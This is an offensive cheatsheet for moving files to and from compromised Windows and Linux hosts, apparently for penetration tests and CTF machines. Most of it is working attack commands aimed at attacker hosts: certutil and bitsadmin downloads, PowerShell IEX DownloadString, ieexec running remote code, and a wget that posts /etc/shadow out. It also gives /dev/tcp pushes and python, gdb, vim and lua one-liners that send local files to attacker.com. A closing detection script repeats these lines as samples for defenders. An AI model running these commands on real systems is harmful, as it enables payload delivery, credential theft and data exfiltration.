Ultimate - File Transfer Cheatsheet
What is this?
This is my cheatsheet for transferring files to and from target machines that are Windows or Linux hosts. It is divided into two sections:
- Windows
- Linux
In each section I have listed the main techniques that let you transfer files easily. The last part of each section, named Others, shows some more tricks that might be useful on a very hardened system. I haven't had to use any of those yet on the machines I have solved, but if the need arises they are something you could try.
Windows
Bitsadmin
bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file
Certutil
certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file
debug.exe
The debug.exe program acts as an assembler, disassembler, and hex dumping tool. We're able to take binaries like netcat (nc.exe) and disassemble them into hex. A series of non-interactive echo commands will write out the binary file in its hex representation. We can then use debug.exe to assemble the hex file back into the original binary nc.exe on the compromised host. There is a 64k size limit for transferable files.
This is close to our limit. We can use upx (an executable packer) to compress it further:
On Kali : upx -9 nc.exe
The file size is now more suitable for transfer and has been decreased by almost 50%. We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we'll be using is exe2bat.exe.
Copy exe2bat.exe to the current working directory:
cp /usr/share/windows-binaries/exe2bat.exe .
wine exe2bat.exe nc.exe nc.txt
This will produce an nc.txt file we can simply copy-paste into the remote Windows shell, and nc.exe will be automatically created on the compromised host.
OpenSSL
Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:1234 > C:\file
PowerShell
Within PowerShell
Invoke-WebRequest -Uri "http://AttackerIP/file" -OutFile "C:\path\to\file"
(New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')
Outside PowerShell
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')
Non-Interactive PowerShell script (use this when transferring files over HTTP) :
IWR "http://yourip/shell.exe" -OutFile "shell.exe"
SMB
- SMBserver.py
On Kali : python smbserver.py transfer_share /root/shells
(the second argument is the directory to share, so shell.exe lives in /root/shells)
On Target Windows :
// We can then check that our SMB share is up and running from our compromised Windows host
net view \\AttackerIP
// Windows commands like dir and copy can also be used
dir \\AttackerIP\transfer_share
copy \\AttackerIP\transfer_share\shell.exe
//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share
C:> \\AttackerIP\transfer_share\shell.exe
- Impacket-SMBServer
On Kali : impacket-smbserver ShareName SharePath
On Windows (Powershell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\ShareName"
If the share has to be created natively with Samba instead of Impacket, this can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y
You would probably mount this on a docker container share.
TFTP
tftp -i AttackerIP get file
FTP
On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21
With the server up and running, we can transfer files interactively or non-interactively:
- Interactively :
- Non-Interactive :
//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt
Visual Basic Script (VBS)
- Option 1 :
// Paste each line separately into the Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://AttackerIP/file file
- Option 2 :
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs
cscript transfer.vbs
Others
- bitsadmin.exe
Download : Create a bitsadmin job named 1, add the remote file to the job, then resume and complete the job.
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Privileges required : User
- certutil.exe
Download : Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User
Download : Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User
- desktopimgdownldr.exe
Download : Downloads the file and sets it as the computer's lockscreen.
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Usecase : Download arbitrary files from a web server
- Esentutl.exe
Download : Copies the source EXE to the destination EXE file.
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Usecase : Use to copy files from one unc path to another
- Expand.exe
Download : Copies the source file to the destination.
expand \\webdav\folder\file.bat c:\ADS\file.bat
Usecase : Copies the source file to the destination file
- Extrac32.exe
Download : Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Usecase:Download file from UNC/WEBDav
- Findstr.exe
Download : Searches for the string W3AllLov3DonaldTrump; since it does not exist (/V), file.exe is downloaded to the target file.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Usecase : Download/Copy file from webdav server
- Ftp.exe
Download : (note the space before the first >, so cmd does not read 21> as a handle redirection)
cmd.exe /c "@echo open attacker.com 21 >ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.
- GfxDownloadWrapper.exe
Download : GfxDownloadWrapper.exe downloads the content returned by URL and writes it to DESTINATION FILE. The binary is signed by "Microsoft Windows Hardware Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Usecase : Download file from internet
- Hh.exe
Download : Open the target PowerShell script with HTML Help.
HH.exe http://some.url/script.ps1
Usecase : Download files from url
- Ieexec.exe
Download : Downloads and executes bypass.exe from the remote server.
ieexec.exe http://x.x.x.x:8080/bypass.exe
Usecase : Download and run attacker code from remote location
- Makecab.exe
Download : Downloads and compresses the target file and stores it in the destination cab file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Usecase : Download file and compress into a cab file
- Replace.exe
Download : Download/Copy bar.exe to outdir.
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Usecase : Download file
- Excel.exe
Download : Downloads payload from remote server.
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase:It will download a remote payload and place it in the cache folder
- Powerpnt.exe
Download : Downloads payload from remote server.
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Squirrel.exe
Download : The binary will go to the url, look for a RELEASES file and download the nuget package.
squirrel.exe --download [url to package]
Usecase : Download binary
- Update.exe
Download : The binary will go to the url, look for a RELEASES file and download the nuget package.
Update.exe --download [url to package]
Usecase : Download binary
- Winword.exe
Download : Downloads payload from remote server.
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Wsl.exe
Download : Downloads file from 192.168.1.10.
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase : Download file
Linux
Bash
cat backup.7z > /dev/tcp/10.10.14.3/9001
curl
fetch (FreeBSD)
fetch -o /var/tmp/file "http://AttackerIP/file"
netcat
Serve a file from a listener (the client connects and reads it) : nc -nlvp 1234 < file
Push a file to a listener : cat file | nc AttackerIP 1234
Transferring files with progress in nc (using pv) :
On Server Side : cat backup.iso | pv -b | nc -l 3333
On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso
Preferably run pv on our side, because we will have the required dependency installed :
nc -lvp 1235 | pv -b > file
OpenSSL
Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Linux host to GET the file : openssl s_client -quiet -connect AttackerIP:1234 > file
Python
chmod +x download.py
python download.py
rsync
- Download Folder :
rsync -r rsync://user@ip/<remote_dir>/ .
- Upload Folder :
rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"
SCP
- To download file from remote system (remote -> local) :
scp user@remote_host:remote_file local_file
- To upload file to remote server (local -> remote):
scp local_file user@remote_host:remote_file
socat
Server : socat TCP4-LISTEN:8000,fork file:<file to transfer>
Client : socat TCP4:<ip>:8000 file:<file to get>,create
wget
wget http://AttackerIP/file -O /var/tmp/file (capital -O is the output file; lowercase -o only sets the log file)
sudo wget --post-file=/etc/shadow 10.10.10.142
Others
- bash
- cpan
- curl
File upload
It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service not to URL-decode the body. Omit the @ to send hard-coded data.
File download
It can download remote files.
Fetch a remote file via HTTP GET request.
- Easy Install
File Upload
It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
easy_install $TF
Serve files in the local folder running an HTTP server.
export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF
File Download
It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(command -v python)', '$(command -v python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
easy_install $TF
- Finger
File Upload : It can exfiltrate files on the network.
Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > "file_to_save" on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
File Download
It can download remote files. Fetch a remote binary file from a remote TCP port. Run base64 "file_to_send" | sudo nc -l -p 79 on the attacker box to send the file.
- ftp
File Upload.
It can exfiltrate files on the network. Send local file to a FTP server.
File Download
It can download remote files. Fetch a remote file from a FTP server.
- GDB
File upload
It can exfiltrate files on the network.
This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quit
This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.
export LPORT=8888
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
File Download
It can download remote files.
This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
- GIMP
File upload : It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
Serve files in the local folder running an HTTP server.
export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
- IRB
File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
- JJS
File download : It can download remote files. Fetch a remote file via HTTP GET request.
- jrunscript
File download : It can download remote files. Fetch a remote file via HTTP GET request.
- ksh
File upload : It can exfiltrate files on the network.
- Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- Send local file using a TCP connection. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
File download : It can download remote files. Fetch a remote file via HTTP GET request.
Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to send the file.
- LUA
File upload : It can exfiltrate files on the network.
Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires lua-socket installed.
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
- LWP-download
File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.
File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires lua-socket installed.
- nc
File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file.
- nmap
File upload : It can exfiltrate files on the network.
- Send a local file via TCP. Run socat -v tcp-listen:8080,reuseaddr,fork on the attacker box to collect the file, or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP port like 80 or 8080.
RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
- Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
File download : It can download remote files.
- Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP port like 80 or 8080.
- Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file.
- openssl
File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:
Send a local file via TCP. Transmission will be encrypted.
File download
It can download remote files. To send the file run the following on the attacker box:
Fetch a file from a TCP port, transmission will be encrypted.
- php
File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
File download. It can download remote files. Fetch a remote file via HTTP GET request.
- pip
File upload.
It can exfiltrate files on the network.
- Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- Serve files in the local folder running an HTTP server.
File download.
It can download remote files.
Fetch a remote file via HTTP GET request. It needs an absolute local file path.
- python
File upload.
It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
Serve files in the local folder running an HTTP server.
export LPORT=8888
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
File download.
It can download remote files.
Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
- Ruby
File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
File download. It can download remote files.
Fetch a remote file via HTTP GET request.
- rvim
File upload. It can exfiltrate files on the network.
- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
- Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
File download.
It can download remote files.
This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
export LPORT=12345
export LFILE=file_to_save
rvim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
- SCP
File upload :
It can exfiltrate files on the network. Send local file to a SSH server.
RPATH=<user>@<attacker_host>:~/file_to_save
LFILE=file_to_send
scp $LFILE $RPATH
File Download :
It can download remote files. Fetch a remote file from a SSH server.
- SFTP
File upload. It can exfiltrate files on the network. Send local file to a SSH server.
File download. It can download remote files. Fetch a remote file from a SSH server.
- SMBCLIENT
File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.
smbclient '\\attacker\share' -c 'put file_to_send where_to_save'
File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.
- socat
File upload. It can exfiltrate files on the network.
Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,create on the attacker box to collect the file.
File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr on the attacker box to send the file.
- SSH
File upload. It can exfiltrate files on the network. Send local file to a SSH server.
File download ; It can download remote files.
Fetch a remote file from a SSH server.
- tar
File upload
It can exfiltrate files on the network. This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
File download
It can download remote files.
This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
- tftp
File upload : It can exfiltrate files on the network. Send local file to a TFTP server.
File download : It can download remote files. Fetch a remote file from a TFTP server.
- vim
File upload : It can exfiltrate files on the network.
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
- Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
File download ; It can download remote files.
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
- Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
- wget
File upload : It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service not to URL-decode the body. Use --post-data to send hard-coded data.
File download ; It can download remote files. Fetch a remote file via HTTP GET request.
- whois
File upload : It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service not to URL-decode the body. Use --post-data to send hard-coded data.
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
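As an added example (not part of the original cheatsheet), the following Python script turns the command lines catalogued in both the Windows and Linux sections into detection patterns and runs them over constructed process-creation records, which is how a defender would spot these transfers in endpoint telemetry. The record format (host|user|command line), the host and user names, the rule names and the 203.0.113.10 address are assumptions made for this example.

```python
"""Flag the file-transfer command lines this cheatsheet catalogues (added example).

Each record is a constructed 'host|user|command line' string standing in for a
process-creation event (Sysmon Event ID 1, auditd execve, or an EDR equivalent).
"""
import re
from typing import Dict, List

# Detection rules built from the commands shown on this page. The rule names are
# labels invented for this example, not vendor or Sigma rule identifiers.
RULES = [
    # Windows section: LOLBins that fetch or copy a file
    ("bitsadmin_download", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile)\b", re.I)),
    ("certutil_download", re.compile(r"\bcertutil(?:\.exe)?\b.*-(?:urlcache|verifyctl)\b", re.I)),
    ("powershell_download", re.compile(
        r"\bpowershell(?:\.exe)?\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)",
        re.I)),
    ("ftp_scripted", re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.I)),
    ("desktopimgdownldr", re.compile(r"\bdesktopimgdownldr(?:\.exe)?\b.*/lockscreenurl:", re.I)),
    ("esentutl_unc_copy", re.compile(r"\besentutl(?:\.exe)?\b.*/y\s+\\\\", re.I)),
    ("findstr_unc_redirect", re.compile(r"\bfindstr(?:\.exe)?\b.*\\\\\S+\s*>\s*\S", re.I)),
    ("cscript_downloader", re.compile(r"\bcscript(?:\.exe)?\b.*\.vbs\b.*https?://", re.I)),
    # Linux section: /dev/tcp redirection and interpreter one-liners
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("interpreter_urllib", re.compile(r"\b(?:python[23]?|gdb|gimp|r?vim|easy_install|pip)\b.*urllib")),
    ("interpreter_httpd", re.compile(r"SimpleHTTPRequestHandler|SimpleHTTPServer|http\.server")),
    ("wget_post_file", re.compile(r"\bwget\b.*--post-file=")),
    ("curl_body_from_file", re.compile(r"\bcurl\b.*(?:-T\s|--upload-file|(?:-d|--data(?:-binary)?)\s*@)")),
    ("nmap_http_put", re.compile(r"\bnmap\b.*--script[= ]http-put\b")),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(records: List[str]) -> List[Dict[str, str]]:
    """Parse 'host|user|cmdline' records and emit one alert per matched rule."""
    alerts = []
    for rec in records:
        # The command line is the last field, so a '|' inside it (cat f | nc ...) survives.
        host, user, cmd = rec.split("|", 2)
        for name in classify(cmd):
            alerts.append({"host": host, "user": user, "rule": name, "cmdline": cmd})
    return alerts


def count_by_host(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Alerts per host, a cheap way to spot the machine doing the most fetching."""
    counts: Dict[str, int] = {}
    for alert in alerts:
        counts[alert["host"]] = counts.get(alert["host"], 0) + 1
    return counts


# Constructed sample records; 203.0.113.10 is a documentation address standing in
# for the attacker host. Lines marked benign should produce no alert.
SAMPLE_RECORDS = [
    "WS01|alice|certutil -urlcache -split -f http://203.0.113.10/file C:\\Users\\Public\\file",
    "WS01|alice|certutil -hashfile C:\\Users\\alice\\setup.exe SHA256",  # benign
    "WS02|bob|bitsadmin /rawreturn /transfer getpayload http://203.0.113.10/file c:\\temp\\out",
    "WS02|bob|powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/file')",
    "WS02|bob|powershell.exe -File C:\\scripts\\backup.ps1",  # benign
    "WS03|svc|ftp -s:C:\\ftp.txt",
    "WS03|svc|findstr /V /L zzz_not_in_file \\\\203.0.113.10\\folder\\file.exe > c:\\ADS\\file.exe",
    "WS03|svc|esentutl.exe /y \\\\203.0.113.10\\tools\\adrestore.exe /d C:\\Users\\Public\\adrestore.exe /o",
    "SRV01|www-data|bash -c 'cat backup.7z > /dev/tcp/203.0.113.10/9001'",
    "SRV01|www-data|python -c 'import urllib.request as r; r.urlretrieve(\"http://203.0.113.10/f\", \"/tmp/f\")'",
    "SRV01|www-data|sudo wget --post-file=/etc/shadow 203.0.113.10",
    "SRV02|deploy|curl -s https://example.invalid/healthz",  # benign
    "SRV02|deploy|nmap -p 8080 203.0.113.10 --script http-put --script-args http-put.url=/,http-put.file=secrets.txt",
]

if __name__ == "__main__":
    found = scan(SAMPLE_RECORDS)
    for alert in found:
        print(f'{alert["host"]:6} {alert["user"]:9} {alert["rule"]:22} {alert["cmdline"]}')
    print("alerts per host:", count_by_host(found))
```

The patterns key on the distinctive switches (-urlcache, /transfer, -s:, --post-file) rather than on the binary name alone, which keeps ordinary certutil, ftp and curl use out of the alert stream.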